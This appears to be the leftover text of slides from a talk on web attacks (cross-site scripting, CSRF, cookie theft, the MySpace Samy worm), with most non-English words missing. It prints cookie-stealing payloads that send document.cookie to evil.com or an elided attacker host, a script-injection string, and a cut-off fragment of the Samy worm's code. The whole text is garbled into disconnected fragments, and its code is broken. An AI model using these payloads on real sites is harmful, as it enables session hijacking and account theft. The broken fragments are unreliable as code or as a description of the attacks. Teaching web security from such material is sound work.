, [email_address] 2.
3.
4.
5.
- 90% - ( UK) ( NTA Monitor).
- CERT advisory XSS 02.02.2000, xss mail.li.ru 30 .
6.
7. Sokr.Ru:
8. http://myappsecurity.blogspot.com/ 9. Hey, Jacks
10. XSS (Cross Site Scripting)
- img1.src='evil.com?' + cookie;
setTimeout loop + remote reqs JS- .com/control.cgi 11. 12.
XSS
- $text = q{a/;alert(42);/};
13. CSRF (X Site Request Forgery)
14. CSRF
15. CSRF
- : XmlHttpRequest * mhtml MSIE vuln = GET .
16. All your cookies are belong to us
- img1.src = 'http://.com/' + document.cookie;
TRACE / HTTP/1.1 Cookies: XHR squid 17.
- Click to Enter YOUR Bank!!
- XSS+AJAX = JavaScript, URL!
18. 19. Javascript is the new shellcode
- MySpace worm, samy is my hero, 2004
- {var E=document.location.search;var
F=E.substring(1,E.length).split('&');var AS=new Array();for(var
O=0;O0){N+='&'}var
- OWASP 2007 . XSS shell & sql injections.
20.
- client-side persistence (visited links, cache).
21.
- MySpace worm samy is my hero, .
22. ?